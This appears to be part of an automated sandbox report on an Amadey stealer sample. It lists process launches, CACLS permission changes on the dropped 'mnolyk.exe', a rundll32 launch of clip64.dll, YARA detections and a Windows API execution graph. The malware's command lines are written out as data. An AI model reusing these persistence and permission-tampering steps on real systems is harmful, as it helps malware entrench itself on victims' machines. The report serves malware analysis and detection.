                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:13
                            Start time:17:37:22
                            Start date:08/02/2023
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7c72c0000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:14
                            Start time:17:37:22
                            Start date:08/02/2023
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                            Imagebase:0xd90000
                            File size:232960 bytes
                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:15
                            Start time:17:37:22
                            Start date:08/02/2023
                            Path:C:\Windows\SysWOW64\cacls.exe
                            Wow64 process (32bit):true
                            Commandline:CACLS "mnolyk.exe" /P "user:N"
                            Imagebase:0xcf0000
                            File size:27648 bytes
                            MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:16
                            Start time:17:37:22
                            Start date:08/02/2023
                            Path:C:\Windows\SysWOW64\cacls.exe
                            Wow64 process (32bit):true
                            Commandline:CACLS "mnolyk.exe" /P "user:R" /E
                            Imagebase:0xcf0000
                            File size:27648 bytes
                            MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:17
                            Start time:17:37:22
                            Start date:08/02/2023
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                            Imagebase:0xd90000
                            File size:232960 bytes
                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:18
                            Start time:17:37:23
                            Start date:08/02/2023
                            Path:C:\Windows\SysWOW64\cacls.exe
                            Wow64 process (32bit):true
                            Commandline:CACLS "..\4b9a106e76" /P "user:N"
                            Imagebase:0xcf0000
                            File size:27648 bytes
                            MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:19
                            Start time:17:37:23
                            Start date:08/02/2023
                            Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Imagebase:0xd50000
                            File size:241664 bytes
                            MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000013.00000000.450697685.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000013.00000002.451269241.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security

                            Target ID:20
                            Start time:17:37:23
                            Start date:08/02/2023
                            Path:C:\Windows\SysWOW64\cacls.exe
                            Wow64 process (32bit):true
                            Commandline:CACLS "..\4b9a106e76" /P "user:R" /E
                            Imagebase:0xcf0000
                            File size:27648 bytes
                            MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:21
                            Start time:17:37:24
                            Start date:08/02/2023
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                            Imagebase:0x2e0000
                            File size:61952 bytes
                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:22
                            Start time:17:38:01
                            Start date:08/02/2023
                            Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Imagebase:0xd50000
                            File size:241664 bytes
                            MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000016.00000000.531737560.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000016.00000002.531952699.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security

                            Target ID:26
                            Start time:17:39:00
                            Start date:08/02/2023
                            Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Imagebase:0xd50000
                            File size:241664 bytes
                            MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001A.00000002.658498410.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001A.00000000.658223943.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security

                            Target ID:27
                            Start time:17:40:00
                            Start date:08/02/2023
                            Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Imagebase:0xd50000
                            File size:241664 bytes
                            MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001B.00000000.786833097.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001B.00000002.787454951.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security

                            Reset < >

                              Execution Graph

                              Execution Coverage:26.9%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:27%
                              Total number of Nodes:967
                              Total number of Limit Nodes:42
                              execution_graph 3128 10e6c03 3129 10e6c1e 3128->3129 3130 10e6c17 _exit 3128->3130 3131 10e6c27 _cexit 3129->3131 3132 10e6c32 3129->3132 3130->3129 3131->3132 2196 10e6f40 SetUnhandledExceptionFilter 2197 10e4cc0 GlobalFree 3133 10e4200 3134 10e421e 3133->3134 3135 10e420b SendMessageA 3133->3135 3135->3134 3136 10e3100 3137 10e31b0 3136->3137 3138 10e3111 3136->3138 3140 10e3141 3137->3140 3141 10e31b9 SendDlgItemMessageA 3137->3141 3139 10e311d 3138->3139 3142 10e3149 GetDesktopWindow 3138->3142 3139->3140 3143 10e3138 EndDialog 3139->3143 3141->3140 3146 10e43d0 6 API calls 3142->3146 3143->3140 3148 10e4463 SetWindowPos 3146->3148 3149 10e6ce0 4 API calls 3148->3149 3150 10e315d 6 API calls 3149->3150 3150->3140 3151 10e4bc0 3152 10e4c05 3151->3152 3154 10e4bd7 3151->3154 3153 10e4c1b SetFilePointer 3152->3153 3152->3154 3153->3154 3155 10e30c0 3156 10e30de CallWindowProcA 3155->3156 3157 10e30ce 3155->3157 3158 10e30da 3156->3158 3157->3156 3157->3158 3159 10e63c0 3160 10e6407 3159->3160 3161 10e658a CharPrevA 3160->3161 3162 10e6415 CreateFileA 3161->3162 3163 10e643a 3162->3163 3164 10e6448 WriteFile 3162->3164 3167 10e6ce0 4 API calls 3163->3167 3165 10e6465 CloseHandle 3164->3165 3165->3163 3168 10e648f 3167->3168 2198 10e4ad0 2206 10e3680 2198->2206 2201 10e4aee WriteFile 2203 10e4b0f 2201->2203 2204 10e4b14 2201->2204 2202 10e4ae9 2204->2203 2205 10e4b3b SendDlgItemMessageA 2204->2205 2205->2203 2207 10e3691 MsgWaitForMultipleObjects 2206->2207 2208 10e36e8 2207->2208 2209 10e36a9 PeekMessageA 2207->2209 2208->2201 2208->2202 2209->2207 2210 10e36bc 2209->2210 2210->2207 2210->2208 2211 10e36c7 DispatchMessageA 2210->2211 2212 10e36d1 PeekMessageA 2210->2212 2211->2212 2212->2210 2213 10e4cd0 2214 10e4d0b 2213->2214 2215 10e4cf4 2213->2215 2216 10e4d02 2214->2216 2219 10e4dcb 2214->2219 2222 10e4d25 2214->2222 2215->2216 2217 10e4b60 FindCloseChangeNotification 2215->2217 2270 10e6ce0 2216->2270 2217->2216 2220 10e4dd4 SetDlgItemTextA 2219->2220 2223 10e4de3 2219->2223 2220->2223 2221 10e4e95 2222->2216 2236 10e4c37 2222->2236 2223->2216 2244 10e476d 2223->2244 2227 10e4e38 2227->2216 2253 10e4980 2227->2253 2232 10e4e64 2261 10e47e0 LocalAlloc 2232->2261 2235 10e4e6f 2235->2216 2237 10e4c4c DosDateTimeToFileTime 2236->2237 2239 10e4c88 2236->2239 2238 10e4c5e LocalFileTimeToFileTime 2237->2238 2237->2239 2238->2239 2240 10e4c70 SetFileTime 2238->2240 2239->2216 2241 10e4b60 2239->2241 2240->2239 2242 10e4b76 SetFileAttributesA 2241->2242 2243 10e4b92 FindCloseChangeNotification 2241->2243 2242->2216 2243->2242 2275 10e66ae GetFileAttributesA 2244->2275 2246 10e477b 2246->2227 2247 10e47cc SetFileAttributesA 2248 10e47db 2247->2248 2248->2227 2252 10e47c2 2252->2247 2254 10e4990 2253->2254 2255 10e49a5 2254->2255 2256 10e49c2 lstrcmpA 2254->2256 2259 10e44b9 20 API calls 2255->2259 2257 10e4a0e 2256->2257 2258 10e49ba 2256->2258 2257->2258 2340 10e487a 2257->2340 2258->2216 2258->2232 2259->2258 2262 10e480f LocalAlloc 2261->2262 2263 10e47f6 2261->2263 2265 10e480b 2262->2265 2267 10e4831 2262->2267 2264 10e44b9 20 API calls 2263->2264 2264->2265 2265->2235 2268 10e44b9 20 API calls 2267->2268 2269 10e4846 LocalFree 2268->2269 2269->2265 2271 10e6ceb 2270->2271 2272 10e6ce8 2270->2272 2353 10e6cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2271->2353 2272->2221 2274 10e6e26 2274->2221 2276 10e4777 2275->2276 2276->2246 2276->2247 2277 10e6517 FindResourceA 2276->2277 2278 10e656b 2277->2278 2279 10e6536 LoadResource 2277->2279 2284 10e44b9 2278->2284 2279->2278 2280 10e6544 DialogBoxIndirectParamA FreeResource 2279->2280 2280->2278 2282 10e47b1 2280->2282 2282->2247 2282->2248 2282->2252 2285 10e44fe LoadStringA 2284->2285 2286 10e455a 2284->2286 2287 10e4527 2285->2287 2288 10e4562 2285->2288 2290 10e6ce0 4 API calls 2286->2290 2313 10e681f 2287->2313 2294 10e45c9 2288->2294 2299 10e457e 2288->2299 2292 10e4689 2290->2292 2292->2282 2293 10e4536 MessageBoxA 2293->2286 2296 10e45cd LocalAlloc 2294->2296 2297 10e4607 LocalAlloc 2294->2297 2296->2286 2302 10e45f3 2296->2302 2297->2286 2309 10e45c4 2297->2309 2299->2299 2301 10e4596 LocalAlloc 2299->2301 2301->2286 2305 10e45af 2301->2305 2306 10e171e _vsnprintf 2302->2306 2303 10e462d MessageBeep 2304 10e681f 10 API calls 2303->2304 2307 10e463b 2304->2307 2330 10e171e 2305->2330 2306->2309 2310 10e67c9 EnumResourceLanguagesA 2307->2310 2312 10e4645 MessageBoxA LocalFree 2307->2312 2309->2303 2310->2312 2312->2286 2314 10e6857 GetVersionExA 2313->2314 2323 10e691a 2313->2323 2317 10e687c 2314->2317 2314->2323 2315 10e6ce0 4 API calls 2316 10e452c 2315->2316 2316->2293 2324 10e67c9 2316->2324 2318 10e68a5 GetSystemMetrics 2317->2318 2317->2323 2319 10e68b5 RegOpenKeyExA 2318->2319 2318->2323 2320 10e68d6 RegQueryValueExA RegCloseKey 2319->2320 2319->2323 2321 10e690c 2320->2321 2320->2323 2334 10e66f9 2321->2334 2323->2315 2325 10e6803 2324->2325 2326 10e67e2 2324->2326 2325->2293 2338 10e6793 EnumResourceLanguagesA 2326->2338 2328 10e67f5 2328->2325 2339 10e6793 EnumResourceLanguagesA 2328->2339 2331 10e172d 2330->2331 2332 10e173d _vsnprintf 2331->2332 2333 10e175d 2331->2333 2332->2333 2333->2309 2335 10e670f 2334->2335 2336 10e6740 CharNextA 2335->2336 2337 10e674b 2335->2337 2336->2335 2337->2323 2338->2328 2339->2325 2341 10e48a2 CreateFileA 2340->2341 2343 10e4908 2341->2343 2344 10e48e9 2341->2344 2343->2258 2344->2343 2345 10e48ee 2344->2345 2348 10e490c 2345->2348 2349 10e48f5 CreateFileA 2348->2349 2351 10e4917 2348->2351 2349->2343 2350 10e4962 CharNextA 2350->2351 2351->2349 2351->2350 2352 10e4953 CreateDirectoryA 2351->2352 2352->2350 2353->2274 3169 10e3210 3170 10e328e EndDialog 3169->3170 3171 10e3227 3169->3171 3186 10e3239 3170->3186 3172 10e3235 3171->3172 3173 10e33e2 GetDesktopWindow 3171->3173 3177 10e324c 3172->3177 3178 10e32dd GetDlgItemTextA 3172->3178 3172->3186 3175 10e43d0 11 API calls 3173->3175 3176 10e33f1 SetWindowTextA SendDlgItemMessageA 3175->3176 3179 10e341f GetDlgItem EnableWindow 3176->3179 3176->3186 3180 10e32c5 EndDialog 3177->3180 3181 10e3251 3177->3181 3187 10e32fc 3178->3187 3202 10e3366 3178->3202 3179->3186 3180->3186 3182 10e325c LoadStringA 3181->3182 3181->3186 3183 10e327b 3182->3183 3184 10e3294 3182->3184 3190 10e44b9 20 API calls 3183->3190 3207 10e4224 LoadLibraryA 3184->3207 3185 10e44b9 20 API calls 3185->3186 3189 10e3331 GetFileAttributesA 3187->3189 3187->3202 3192 10e333f 3189->3192 3193 10e337c 3189->3193 3190->3170 3196 10e44b9 20 API calls 3192->3196 3195 10e658a CharPrevA 3193->3195 3194 10e32a5 SetDlgItemTextA 3194->3183 3194->3186 3197 10e338d 3195->3197 3198 10e3351 3196->3198 3199 10e58c8 27 API calls 3197->3199 3198->3186 3200 10e335a CreateDirectoryA 3198->3200 3201 10e3394 3199->3201 3200->3193 3200->3202 3201->3202 3203 10e33a4 3201->3203 3202->3185 3204 10e33c7 EndDialog 3203->3204 3205 10e597d 34 API calls 3203->3205 3204->3186 3206 10e33c3 3205->3206 3206->3186 3206->3204 3208 10e4246 GetProcAddress 3207->3208 3209 10e43b2 3207->3209 3210 10e425d GetProcAddress 3208->3210 3211 10e43a4 FreeLibrary 3208->3211 3213 10e44b9 20 API calls 3209->3213 3210->3211 3212 10e4274 GetProcAddress 3210->3212 3211->3209 3212->3211 3214 10e428b 3212->3214 3215 10e329d 3213->3215 3216 10e4295 GetTempPathA 3214->3216 3220 10e42e1 3214->3220 3215->3186 3215->3194 3217 10e42ad 3216->3217 3217->3217 3218 10e42b4 CharPrevA 3217->3218 3219 10e42d0 CharPrevA 3218->3219 3218->3220 3219->3220 3221 10e4390 FreeLibrary 3220->3221 3221->3215 3222 10e4a50 3223 10e4a9f ReadFile 3222->3223 3225 10e4a66 3222->3225 3226 10e4abb 3223->3226 3224 10e4a82 memcpy 3224->3226 3225->3224 3225->3226 3227 10e3450 3228 10e345e 3227->3228 3229 10e34d3 EndDialog 3227->3229 3231 10e349a GetDesktopWindow 3228->3231 3232 10e3465 3228->3232 3230 10e346a 3229->3230 3233 10e43d0 11 API calls 3231->3233 3232->3230 3235 10e348c EndDialog 3232->3235 3234 10e34ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3233->3234 3234->3230 3235->3230 3236 10e6bef _XcptFilter 2354 10e4ca0 GlobalAlloc 2355 10e6a60 2372 10e7155 2355->2372 2357 10e6a65 2358 10e6a76 GetStartupInfoW 2357->2358 2359 10e6a93 2358->2359 2360 10e6aa8 2359->2360 2361 10e6aaf Sleep 2359->2361 2362 10e6ac7 _amsg_exit 2360->2362 2364 10e6ad1 2360->2364 2361->2359 2362->2364 2363 10e6b13 _initterm 2365 10e6b2e __IsNonwritableInCurrentImage 2363->2365 2364->2363 2364->2365 2367 10e6af4 2364->2367 2366 10e6bd6 _ismbblead 2365->2366 2368 10e6c1e 2365->2368 2371 10e6bbe exit 2365->2371 2377 10e2bfb GetVersion 2365->2377 2366->2365 2368->2367 2370 10e6c27 _cexit 2368->2370 2370->2367 2371->2365 2373 10e717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2372->2373 2374 10e717a 2372->2374 2376 10e71cd 2373->2376 2374->2373 2375 10e71e2 2374->2375 2375->2357 2376->2375 2378 10e2c0f 2377->2378 2379 10e2c50 2377->2379 2378->2379 2380 10e2c13 GetModuleHandleW 2378->2380 2394 10e2caa memset memset memset 2379->2394 2380->2379 2382 10e2c22 GetProcAddress 2380->2382 2382->2379 2391 10e2c34 2382->2391 2384 10e2c8e 2385 10e2c9e 2384->2385 2386 10e2c97 CloseHandle 2384->2386 2385->2365 2386->2385 2391->2379 2392 10e2c89 2489 10e1f90 2392->2489 2506 10e468f FindResourceA SizeofResource 2394->2506 2397 10e2e30 2400 10e44b9 20 API calls 2397->2400 2398 10e2d2d CreateEventA SetEvent 2399 10e468f 7 API calls 2398->2399 2401 10e2d57 2399->2401 2402 10e2f06 2400->2402 2403 10e2d7d 2401->2403 2404 10e2d5b 2401->2404 2407 10e6ce0 4 API calls 2402->2407 2406 10e2e1f 2403->2406 2410 10e468f 7 API calls 2403->2410 2405 10e44b9 20 API calls 2404->2405 2408 10e2d6e 2405->2408 2511 10e5c9e 2406->2511 2411 10e2c62 2407->2411 2408->2402 2413 10e2d9f 2410->2413 2411->2384 2435 10e2f1d 2411->2435 2413->2404 2415 10e2da3 CreateMutexA 2413->2415 2414 10e2e3a 2416 10e2e52 FindResourceA 2414->2416 2417 10e2e43 2414->2417 2415->2406 2418 10e2dbd GetLastError 2415->2418 2421 10e2e6e 2416->2421 2422 10e2e64 LoadResource 2416->2422 2537 10e2390 2417->2537 2418->2406 2420 10e2dca 2418->2420 2423 10e2dea 2420->2423 2424 10e2dd5 2420->2424 2421->2408 2552 10e36ee GetVersionExA 2421->2552 2422->2421 2425 10e44b9 20 API calls 2423->2425 2426 10e44b9 20 API calls 2424->2426 2427 10e2dff 2425->2427 2429 10e2de8 2426->2429 2427->2406 2430 10e2e04 CloseHandle 2427->2430 2429->2430 2430->2402 2434 10e6517 24 API calls 2434->2408 2436 10e2f3f 2435->2436 2437 10e2f6c 2435->2437 2439 10e2f5f 2436->2439 2641 10e51e5 2436->2641 2661 10e5164 2437->2661 2794 10e3a3f 2439->2794 2441 10e2f71 2472 10e3041 2441->2472 2676 10e55a0 2441->2676 2447 10e6ce0 4 API calls 2449 10e2c6b 2447->2449 2448 10e2f86 GetSystemDirectoryA 2450 10e658a CharPrevA 2448->2450 2476 10e52b6 2449->2476 2451 10e2fab LoadLibraryA 2450->2451 2452 10e2ff7 FreeLibrary 2451->2452 2453 10e2fc0 GetProcAddress 2451->2453 2454 10e3006 2452->2454 2455 10e3017 SetCurrentDirectoryA 2452->2455 2453->2452 2456 10e2fd6 DecryptFileA 2453->2456 2454->2455 2726 10e621e GetWindowsDirectoryA 2454->2726 2457 10e3026 2455->2457 2458 10e3054 2455->2458 2456->2452 2463 10e2ff0 2456->2463 2461 10e44b9 20 API calls 2457->2461 2459 10e3061 2458->2459 2737 10e3b26 2458->2737 2465 10e307a 2459->2465 2459->2472 2746 10e256d 2459->2746 2467 10e3037 2461->2467 2463->2452 2469 10e3098 2465->2469 2757 10e3ba2 2465->2757 2813 10e6285 GetLastError 2467->2813 2469->2472 2473 10e30af 2469->2473 2472->2447 2815 10e4169 2473->2815 2477 10e52d6 2476->2477 2486 10e5316 2476->2486 2480 10e5300 LocalFree LocalFree 2477->2480 2482 10e52eb SetFileAttributesA DeleteFileA 2477->2482 2478 10e5374 2479 10e538c 2478->2479 3124 10e1fe1 2478->3124 2481 10e6ce0 4 API calls 2479->2481 2480->2477 2480->2486 2484 10e2c72 2481->2484 2482->2480 2484->2384 2484->2392 2485 10e535e SetCurrentDirectoryA 2488 10e2390 13 API calls 2485->2488 2486->2478 2486->2485 2487 10e65e8 4 API calls 2486->2487 2487->2485 2488->2478 2490 10e1f9a 2489->2490 2491 10e1f9f 2489->2491 2492 10e1ea7 15 API calls 2490->2492 2493 10e1fc0 2491->2493 2496 10e44b9 20 API calls 2491->2496 2497 10e1fd9 2491->2497 2492->2491 2494 10e1fcf ExitWindowsEx 2493->2494 2495 10e1ee2 GetCurrentProcess OpenProcessToken 2493->2495 2493->2497 2494->2497 2499 10e1f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2495->2499 2501 10e1f0e 2495->2501 2496->2493 2497->2384 2500 10e1f6b ExitWindowsEx 2499->2500 2499->2501 2500->2501 2502 10e1f1f 2500->2502 2503 10e44b9 20 API calls 2501->2503 2504 10e6ce0 4 API calls 2502->2504 2503->2502 2505 10e1f8c 2504->2505 2505->2384 2507 10e46b6 2506->2507 2509 10e2d1a 2506->2509 2508 10e46be FindResourceA LoadResource LockResource 2507->2508 2507->2509 2508->2509 2510 10e46df memcpy_s FreeResource 2508->2510 2509->2397 2509->2398 2510->2509 2517 10e5e17 2511->2517 2520 10e5cc3 2511->2520 2512 10e6ce0 4 API calls 2514 10e2e2c 2512->2514 2513 10e5dd0 2516 10e5dec GetModuleFileNameA 2513->2516 2513->2517 2514->2397 2514->2414 2515 10e5ced CharNextA 2515->2520 2516->2517 2518 10e5e0a 2516->2518 2517->2512 2587 10e66c8 2518->2587 2520->2513 2520->2515 2520->2517 2521 10e6218 2520->2521 2524 10e5e36 CharUpperA 2520->2524 2530 10e5f9f CharUpperA 2520->2530 2531 10e5f59 CompareStringA 2520->2531 2532 10e6003 CharUpperA 2520->2532 2533 10e5edc CharUpperA 2520->2533 2534 10e60a2 CharUpperA 2520->2534 2535 10e667f IsDBCSLeadByte CharNextA 2520->2535 2592 10e658a 2520->2592 2596 10e6e2a 2521->2596 2524->2520 2525 10e61d0 2524->2525 2526 10e44b9 20 API calls 2525->2526 2527 10e61e7 2526->2527 2528 10e61f7 ExitProcess 2527->2528 2529 10e61f0 CloseHandle 2527->2529 2529->2528 2530->2520 2531->2520 2532->2520 2533->2520 2534->2520 2535->2520 2538 10e24cb 2537->2538 2539 10e23b9 2537->2539 2540 10e6ce0 4 API calls 2538->2540 2539->2538 2542 10e23e9 FindFirstFileA 2539->2542 2541 10e24dc 2540->2541 2541->2408 2542->2538 2550 10e2407 2542->2550 2543 10e2479 2547 10e2488 SetFileAttributesA DeleteFileA 2543->2547 2544 10e2421 lstrcmpA 2545 10e24a9 FindNextFileA 2544->2545 2546 10e2431 lstrcmpA 2544->2546 2548 10e24bd FindClose RemoveDirectoryA 2545->2548 2545->2550 2546->2545 2546->2550 2547->2545 2548->2538 2549 10e658a CharPrevA 2549->2550 2550->2543 2550->2544 2550->2545 2550->2549 2551 10e2390 5 API calls 2550->2551 2551->2550 2556 10e3737 2552->2556 2558 10e372d 2552->2558 2553 10e44b9 20 API calls 2566 10e39fc 2553->2566 2554 10e6ce0 4 API calls 2555 10e2e92 2554->2555 2555->2402 2555->2408 2567 10e18a3 2555->2567 2556->2558 2559 10e38a4 2556->2559 2556->2566 2603 10e28e8 2556->2603 2558->2553 2558->2566 2559->2558 2560 10e39c1 MessageBeep 2559->2560 2559->2566 2561 10e681f 10 API calls 2560->2561 2562 10e39ce 2561->2562 2563 10e39d8 MessageBoxA 2562->2563 2564 10e67c9 EnumResourceLanguagesA 2562->2564 2563->2566 2564->2563 2566->2554 2568 10e19b8 2567->2568 2569 10e18d5 2567->2569 2571 10e6ce0 4 API calls 2568->2571 2632 10e17ee LoadLibraryA 2569->2632 2573 10e19d5 2571->2573 2573->2408 2573->2434 2574 10e18e5 GetCurrentProcess OpenProcessToken 2574->2568 2575 10e1900 GetTokenInformation 2574->2575 2576 10e19aa CloseHandle 2575->2576 2577 10e1918 GetLastError 2575->2577 2576->2568 2577->2576 2578 10e1927 LocalAlloc 2577->2578 2579 10e1938 GetTokenInformation 2578->2579 2580 10e19a9 2578->2580 2581 10e194e AllocateAndInitializeSid 2579->2581 2582 10e19a2 LocalFree 2579->2582 2580->2576 2581->2582 2586 10e196e 2581->2586 2582->2580 2583 10e1999 FreeSid 2583->2582 2584 10e1975 EqualSid 2585 10e198c 2584->2585 2584->2586 2585->2583 2586->2583 2586->2584 2586->2585 2588 10e66d5 2587->2588 2589 10e66f3 2588->2589 2591 10e66e5 CharNextA 2588->2591 2599 10e6648 2588->2599 2589->2517 2591->2588 2593 10e659b 2592->2593 2593->2593 2594 10e65b8 CharPrevA 2593->2594 2595 10e65ab 2593->2595 2594->2595 2595->2520 2602 10e6cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2596->2602 2598 10e621d 2600 10e665d IsDBCSLeadByte 2599->2600 2601 10e6668 2599->2601 2600->2601 2601->2588 2602->2598 2604 10e2a62 2603->2604 2611 10e290d 2603->2611 2605 10e2a6e GlobalFree 2604->2605 2606 10e2a75 2604->2606 2605->2606 2606->2559 2608 10e2955 GlobalAlloc 2608->2604 2609 10e2968 GlobalLock 2608->2609 2609->2604 2609->2611 2610 10e2a20 GlobalUnlock 2610->2611 2611->2604 2611->2608 2611->2610 2612 10e2a80 GlobalUnlock 2611->2612 2613 10e2773 2611->2613 2612->2604 2614 10e28b2 2613->2614 2615 10e27a3 CharUpperA CharNextA CharNextA 2613->2615 2617 10e28b7 GetSystemDirectoryA 2614->2617 2616 10e27db 2615->2616 2615->2617 2618 10e28a8 GetWindowsDirectoryA 2616->2618 2620 10e27e3 2616->2620 2619 10e28bf 2617->2619 2618->2619 2621 10e28d2 2619->2621 2622 10e658a CharPrevA 2619->2622 2624 10e658a CharPrevA 2620->2624 2623 10e6ce0 4 API calls 2621->2623 2622->2621 2625 10e28e2 2623->2625 2626 10e2810 RegOpenKeyExA 2624->2626 2625->2611 2626->2619 2627 10e2837 RegQueryValueExA 2626->2627 2628 10e285c 2627->2628 2629 10e289a RegCloseKey 2627->2629 2630 10e2867 ExpandEnvironmentStringsA 2628->2630 2631 10e287a 2628->2631 2629->2619 2630->2631 2631->2629 2633 10e1826 GetProcAddress 2632->2633 2634 10e1890 2632->2634 2636 10e1889 FreeLibrary 2633->2636 2637 10e1839 AllocateAndInitializeSid 2633->2637 2635 10e6ce0 4 API calls 2634->2635 2638 10e189f 2635->2638 2636->2634 2637->2636 2639 10e185f FreeSid 2637->2639 2638->2568 2638->2574 2639->2636 2642 10e468f 7 API calls 2641->2642 2643 10e51f9 LocalAlloc 2642->2643 2644 10e522d 2643->2644 2645 10e520d 2643->2645 2647 10e468f 7 API calls 2644->2647 2646 10e44b9 20 API calls 2645->2646 2648 10e521e 2646->2648 2649 10e523a 2647->2649 2652 10e6285 GetLastError 2648->2652 2650 10e523e 2649->2650 2651 10e5262 lstrcmpA 2649->2651 2653 10e44b9 20 API calls 2650->2653 2654 10e527e 2651->2654 2655 10e5272 LocalFree 2651->2655 2660 10e5223 2652->2660 2656 10e524f LocalFree 2653->2656 2658 10e44b9 20 API calls 2654->2658 2657 10e2f4d 2655->2657 2656->2657 2657->2437 2657->2439 2657->2472 2659 10e5290 LocalFree 2658->2659 2659->2660 2660->2657 2662 10e468f 7 API calls 2661->2662 2663 10e5175 2662->2663 2664 10e517a 2663->2664 2665 10e51af 2663->2665 2666 10e44b9 20 API calls 2664->2666 2667 10e468f 7 API calls 2665->2667 2668 10e518d 2666->2668 2669 10e51c0 2667->2669 2668->2441 2828 10e6298 2669->2828 2673 10e51ce 2675 10e44b9 20 API calls 2673->2675 2674 10e51e1 2674->2441 2675->2668 2677 10e468f 7 API calls 2676->2677 2678 10e55c7 LocalAlloc 2677->2678 2679 10e55fd 2678->2679 2680 10e55db 2678->2680 2681 10e468f 7 API calls 2679->2681 2682 10e44b9 20 API calls 2680->2682 2683 10e560a 2681->2683 2684 10e55ec 2682->2684 2685 10e560e 2683->2685 2686 10e5632 lstrcmpA 2683->2686 2687 10e6285 GetLastError 2684->2687 2688 10e44b9 20 API calls 2685->2688 2689 10e564b LocalFree 2686->2689 2690 10e5645 2686->2690 2710 10e55f1 2687->2710 2691 10e561f LocalFree 2688->2691 2692 10e565b 2689->2692 2693 10e5696 2689->2693 2690->2689 2704 10e55f6 2691->2704 2700 10e5467 49 API calls 2692->2700 2694 10e589f 2693->2694 2697 10e56ae GetTempPathA 2693->2697 2695 10e6517 24 API calls 2694->2695 2695->2704 2696 10e6ce0 4 API calls 2698 10e2f7e 2696->2698 2699 10e56c3 2697->2699 2701 10e56eb 2697->2701 2698->2448 2698->2472 2840 10e5467 